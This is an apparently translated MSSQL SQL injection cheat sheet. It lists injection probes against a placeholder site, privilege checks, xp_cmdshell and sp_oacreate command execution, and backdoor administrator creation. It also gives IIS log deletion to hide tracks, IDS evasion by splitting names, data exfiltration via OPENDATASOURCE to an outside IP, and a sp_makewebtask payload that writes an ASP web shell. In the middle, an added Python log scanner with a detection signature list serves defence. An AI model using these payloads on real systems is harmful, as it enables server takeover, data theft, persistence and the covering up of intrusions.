and exists (select * from sysobjects) // check whether the backend is MSSQL
and exists (select * from tableName) // check whether a table exists; tableName is the table name
and 1=(select @@VERSION) // MSSQL version
and 1=(select db_name()) // current database name
and 1=(select @@servername) // local server name
and 1=(select IS_SRVROLEMEMBER('sysadmin')) // check whether the current login is a system administrator
and 1=(select IS_MEMBER('db_owner')) // check whether the current user has db_owner permission
and 1=(select HAS_DBACCESS('master')) // check whether the current user can read the database
and 1=(select name from master.dbo.sysdatabases where dbid=1) // brute-force database names; dbid is 1, 2, 3 ...
; declare @d int // check whether stacked (multi-statement) queries are supported
and 1=(select count(*) FROM master.dbo.sysobjects where xtype='X' AND name='xp_cmdshell') // check whether xp_cmdshell exists
and 1=(select count(*) FROM master.dbo.sysobjects where name='xp_regread') // check whether the xp_regread extended stored procedure has been deleted
Add a login named test with the sysadmin role (sa permission required):
exec master.dbo.sp_addlogin test, password
exec master.dbo.sp_addsrvrolemember test, sysadmin
Stop or start a service (sa permission required):
exec master..xp_servicecontrol 'stop', 'schedule'
exec master..xp_servicecontrol 'start', 'schedule'
Brute-force the website directory:
create table labeng (lala nvarchar(255), id int)
declare @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'System\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into labeng (lala) values (@result);
and 1=(select top 1 lala from labeng), or alternatively: and 1=(select count(*) from labeng where lala>1)
-----------------------------------------------------
Enable 3389 from a command prompt and change the port number
sc config termservice start= auto
net start termservice
// Allow external connections
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
// Change port 3389 to port 80
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 80 /f
SQL Server
Determine whether the parameter is injectable:
http://www.targer.com/article.asp?id=6
http://www.targer.com/article.asp?id=6'
http://www.targer.com/article.asp?id=6 and 1=1
http://www.targer.com/article.asp?id=6 and 1=2
http://www.targer.com/article.asp?action=value' and 1=1
http://www.targer.com/article.asp?action=value' and 1=2
searchpoints%' and 1=1
searchpoints%' and 1=2
Determine the database type:
http://www.targer.com/article.asp?id=6 and user>0
http://www.targer.com/article.asp?id=6 and (select count(*) from sysobjects)>0
Query the current user's data (error-based):
article.asp?id=6 having 1=1 --
Columns in the current table:
article.asp?id=6 group by admin.username having 1=1 --
article.asp?id=6 group by admin.username, admin.password having 1=1 --
Arbitrary tables and columns:
and (select top 1 name from (select top N id, name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top 1 col_name(object_id('admin'), N) from sysobjects)>1
Brute-force database data:
and (select top 1 password from admin where id=N)>1
Modify data in the database:
; update admin set password='oooooooo' where username='xxx'
Add data to the database:
; insert into admin values (xxx, oooooooo)--
Delete a database:
; drop database webdata
Get the current database user name: and user>0
Get the current database name: and db_name()>0
Get the database version: and (select @@version)>0
Determine whether stacked queries are supported: ; declare @a int --
Determine whether subqueries are supported: and (select count(1) from [sysobjects])>=0
Extended stored procedure for command execution: exec master..xp_cmdshell
View the directory of the server's C: drive: ; exec master..xp_cmdshell 'dir c:\'
Determine whether the extended stored procedure exists: and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')
Restore the extended stored procedure: ; exec sp_addextendedproc xp_cmdshell, 'xplog70.dll'
Delete the extended stored procedure: ; exec sp_dropextendedproc 'xp_cmdshell'
MSSQL 2000 provides procedures that indirectly obtain command execution through access to OLE objects:
; declare @s int
; exec sp_oacreate 'wscript.shell', @s output
; exec master..sp_oamethod @s, 'run', null, 'cmd.exe /c dir c:\'
Determine whether the current database login holds a high-privilege server role:
and 1=(select is_srvrolemember('sysadmin'))
and 1=(select is_srvrolemember('serveradmin'))
and 1=(select is_srvrolemember('setupadmin'))
and 1=(select is_srvrolemember('securityadmin'))
and 1=(select is_srvrolemember('diskadmin'))
and 1=(select is_srvrolemember('bulkadmin'))
Determine whether the current database user is db_owner:
and 1=(select is_member('db_owner'))
All database information in SQL Server is stored in the master.dbo.sysdatabases table; only the PUBLIC permission is needed to SELECT from it:
and (select top 1 name from master.dbo.sysdatabases order by dbid)>0
and (select top 1 name from master.dbo.sysdatabases where name not in (select top 1 name from master.dbo.sysdatabases order by dbid))>0
Delete log records:
; exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5\ex070606.log > c:\temp.txt'
Replace log records:
exec master.dbo.xp_cmdshell 'copy c:\winnt\system32\logfiles\w3svc5\ex070404.log c:\winnt\system32\logfiles\w3svc5\ex070606.log > c:\temp.txt'
Obtain the web root path:
; declare @shell int
; exec master..sp_oacreate 'wscript.shell', @shell out
; exec master..sp_oamethod @shell, 'run', null, 'cmd.exe /c dir /s d:/index.asp > c:/log.txt'
Search with xp_cmdshell:
; exec master..xp_cmdshell 'dir /s d:/index.asp'
Commands for displaying the server's website configuration:
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/1/root
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/2/root
Use xp_regread to read data with PUBLIC permission:
; exec master.dbo.xp_regread
hkey_local_machine,
'system\currentcontrolset\services\w3svc\parameters\virtual roots\',
'/'
For more on advanced SQL Server techniques, see chapter 5 of "Proficient Script Hacker" by Zeng Yunhao.
3. DSqlHelper
Check the SYSADMIN permission:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
The same check applies to serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin, and db_owner.
Check XP_CMDSHELL (runs CMD commands):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_cmdshell')
Check XP_REGREAD (registry read function):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_regread')
Check SP_MAKEWEBTASK (backup function):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='sp_makewebtask')
Check SP_ADDEXTENDEDPROC:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='sp_addextendedproc')
Check XP_SUBDIRS (reads subdirectories):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_subdirs')
Check XP_DIRTREE (reads the directory tree):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_dirtree')
Modify content:
; UPDATE tableName set field=content where 1=1
xp_cmdshell detection:
; exec master..xp_cmdshell 'dir c:\'
Restore XP_CMDSHELL:
; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
Use XP_CMDSHELL to add the user hacker:
; exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'
Use xp_cmdshell to add the user hacker to the administrators group:
; exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
Create the table test:
; create table [dbo].[test] ([dstr] [char](255));
Test:
and exists (select * from test)
Read the web root location (from the registry):
; DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'System\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into test (dstr) values (@result);--
Expose the absolute path of the web root (explicit error mode):
and 1=(select count(*) from test where dstr>1)
Delete the table test:
; drop table test;--
Create the table dirs to view a directory:
; create table dirs (paths varchar(100), id int)
Insert the directory listing into the dirs table:
; insert dirs exec master.dbo.xp_dirtree 'C:\'
Dump the directory contents from dirs:
and 0<>(select top 1 paths from dirs)
Back up the current database:
declare @a sysname; set @a=db_name(); backup database @a to disk='C:\inetpub\wwwroot\down.bak';--
Delete the table dirs:
; drop table dirs;--
Create the table temp:
; create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
Insert the list of drives into the temp table:
; insert temp exec master.dbo.xp_availablemedia;--
Clear the table temp:
; delete from temp;--
Create the table dirs:
; create table dirs (paths varchar(100), id int);--
Obtain the subdirectory list with XP_SUBDIRS:
; insert dirs exec master.dbo.xp_subdirs 'C:\';--
Dump the contents (explicit error mode):
and 0<>(select top 1 paths from dirs)
Clear the table dirs:
; delete from dirs;--
Create the table dirs:
; create table dirs (paths varchar(100), id int)--
Use XP_CMDSHELL to view the directory contents:
; insert dirs exec master..xp_cmdshell 'dir c:\'
Clear the table dirs:
; delete from dirs;--
Check SP_OACREATE (command execution):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='sp_oacreate')
SP_OACREATE:
; DECLARE @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\windows\system32\cmd.exe /c net user hacker 123456 /add'
SP_OACREATE, create a directory:
; DECLARE @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\windows\system32\cmd.exe /c md E:\XkCmsV\webForm\1111'
Create a virtual directory e for drive E:
; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "Default Web Site" -v "e", "e:\"'
Set the virtual directory e to browsable:
; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'
Start the Server service:
; exec master..xp_servicecontrol 'start', 'server'
Bypass IDS detection of xp_cmdshell by splitting the name:
; declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
Open a remote database, method 1:
; select * from OPENROWSET('sqloledb', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1')
Open a remote database, method 2:
; select * from OPENROWSET('sqloledb', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table')
// Check permissions
and 1=(select IS_MEMBER('db_owner'))
and char(124)%2Bcast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1;--
// Check whether you have permission to read a database
and 1=(select HAS_DBACCESS('master'))
and char(124)%2Bcast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1--
Numeric type:
and char(124)%2Buser%2Bchar(124)=0
Character type:
' and char(124)%2Buser%2Bchar(124)=0 and ''='
Search type:
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
Brute-force the user name:
and user>0
' and user>0 and ''='
Check whether the permission is sa:
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
and char(124)%2Bcast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1--
Check whether the database is MSSQL:
and exists (select * from sysobjects);--
Check whether stacked queries are supported:
; declare @d int;--
Restore xp_cmdshell:
; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll';--
select * from openrowset('sqloledb', 'server=192.168.1.200,1433;uid=test;pwd=pafsp', 'select @@version')
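From the defender's side, the probes above (the sysobjects / IS_SRVROLEMEMBER fingerprints, the char(124)%2B... error-based form, the UTF-16LE hex literal standing in for 'sysadmin', and the 'xp_'+'cmdshell' name-splitting evasion) are all visible in web server request logs once the query string is decoded and normalized. The following detector is an added example, not code from the original page; the log lines are constructed, and the signature list is drawn from the procedures this page names.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style request log (method, URI, query string); not from the original page.
SAMPLE_LOG = """\
GET /article.asp id=6
GET /article.asp id=6+and+1%3D(select+IS_SRVROLEMEMBER('sysadmin'))
GET /article.asp id=6+and+char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)+as+varchar(1))%2Bchar(124)%3D1--
GET /article.asp id=6;declare+@a+sysname+set+@a%3D'xp_'%2B'cmdshell'+exec+@a+'dir+c:\\'
GET /search.asp q=red+shoes
GET /display.asp keyno=188+and+1%3D(Select+count(*)+FROM+master.dbo.sysobjects+Where+xtype%3D'X'+AND+name%3D'xp_cmdshell')
"""

# Fingerprints of the MSSQL probes and extended procedures this page lists (lowercase, matched after normalizing).
SIGNATURES = [
    "sysobjects", "sysdatabases", "is_srvrolemember", "is_member(", "has_dbaccess",
    "@@version", "db_name(", "xp_cmdshell", "xp_regread", "xp_regwrite", "xp_dirtree",
    "xp_subdirs", "sp_oacreate", "sp_oamethod", "sp_addextendedproc", "sp_makewebtask",
    "openrowset", "opendatasource", "xp_servicecontrol", "having 1=1",
]
HEX_LITERAL = re.compile(r"0x([0-9a-f]{4,})")
CONCAT = re.compile(r"'\s*\+\s*'")  # undoes 'xp_'+'cmdshell' string splitting

def _decode_hex(match: re.Match) -> str:
    """Render a 0x... literal as text (UTF-16LE, the N'...' hex form) so names hidden in hex still match."""
    hexstr = match.group(1)
    if len(hexstr) % 4:  # not a whole number of UTF-16LE code units; leave it alone
        return match.group(0)
    return bytes.fromhex(hexstr).decode("utf-16-le", errors="replace")

def normalize(query: str) -> str:
    """URL-decode (%2B becomes '+', '+' becomes space), lowercase, fold whitespace, undo the two evasions."""
    text = re.sub(r"\s+", " ", unquote_plus(query).lower())
    text = CONCAT.sub("", text)
    return HEX_LITERAL.sub(_decode_hex, text)

def scan_log(log: str) -> list[tuple[str, list[str]]]:
    """Return (uri, matched signatures) for each request whose normalized query hits a fingerprint."""
    findings = []
    for line in log.splitlines():
        if not line.strip():
            continue
        _method, uri, query = line.split(" ", 2)
        hits = [sig for sig in SIGNATURES if sig in normalize(query)]
        if hits:
            findings.append((uri, hits))
    return findings

if __name__ == "__main__":
    for uri, hits in scan_log(SAMPLE_LOG):
        print(f"{uri}: {', '.join(hits)}")
```

Plain substring matching on the raw query would miss the third and fourth lines; the decode and concatenation folding in normalize() is what makes them match.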
//-----------------------
// Execute commands
//-----------------------
First, enable the Jet sandbox mode:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 1
Then run a system command through Jet OLE DB:
select * from openrowset('Microsoft.Jet.OLEDB.4.0', ';database=c:\winnt\system32\ias.mdb', 'select shell("cmd.exe /c net user admin admin1234 /add")')
Execute a command:
; DECLARE @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
EXEC [master].[dbo].[xp_cmdshell] 'COMMAND /c md c:\8080'
Determine whether the xp_cmdshell extended stored procedure exists:
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype='X' AND name='xp_cmdshell')
Write to the registry:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 1
The value type can also be REG_SZ.
Read the registry:
exec master..xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows NT\CurrentVersion\Winlogon', 'userinit'
Read directory contents:
exec master..xp_dirtree 'C:\winnt\system32\', 1, 1
Database backup:
backup database pubs to disk='C:\123.bak'
// Brute-force the length
and (select char(124)%2Bcast(count(1) as varchar(8000))%2Bchar(124) from D99_Tmp)=0;--
To change the sa password, run the following command:
exec sp_password NULL, 'newpassword', 'sa'
Add a login named test with the sysadmin role:
exec master.dbo.sp_addlogin test, ptlove
exec master.dbo.sp_addsrvrolemember test, sysadmin
Delete the xp_cmdshell extended stored procedure:
exec sp_dropextendedproc 'xp_cmdshell'
Add an extended stored procedure:
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec ON xp_proxiedadata TO public
Stop or start a service:
exec master..xp_servicecontrol 'stop', 'schedule'
exec master..xp_servicecontrol 'start', 'schedule'
dbo.xp_subdirs
Lists only the subdirectories of a directory.
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
dbo.xp_makecab
Compresses multiple target files into a single cabinet file.
All files to be compressed are appended to the end of the parameter list, separated by commas.
dbo.xp_makecab
'C:\test.cab', 'mszip', 1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
xp_terminate_process
Stops a running program; the process ID must be passed as the parameter.
Choose "View" and then "Select Columns" in Task Manager to see the process ID of each running program.
xp_terminate_process 2484
xp_unpackcab
Uncompresses a cabinet file.
xp_unpackcab 'C:\test.cab', 'c:\temp', 1
A machine had Radmin installed and its password had been changed; regedit.exe had been deleted or altered and net.exe did not exist, so a registry file could not be imported with regedit, but MSSQL ran with sa permission. The following command changes the Radmin password to 12345678:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'System\RAdmin\v2.0\Server\Parameters', 'Parameter', 'REG_BINARY', 0x02ba5e187e2589be6f80da0046aa7e3c
To change the port value:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'System\RAdmin\v2.0\Server\Parameters', 'Port', 'REG_BINARY', 0xd20400
which sets the port value to 1234.
create database lcx;
create table ku (name nvarchar(256) null);
create table biao (id int null, name nvarchar(256) null);
// Obtain the database names
insert into opendatasource('sqloledb', 'server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
// Create a table in master to check permissions
create table master..D_TEST (id nvarchar(4000) NULL, Data nvarchar(4000) NULL);--
Use sp_makewebtask to write a one-line script file directly into the web directory:
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
// Update table content
update films SET kind='Dramatic' where id=123
// Delete content
delete from table_name where Stockid=3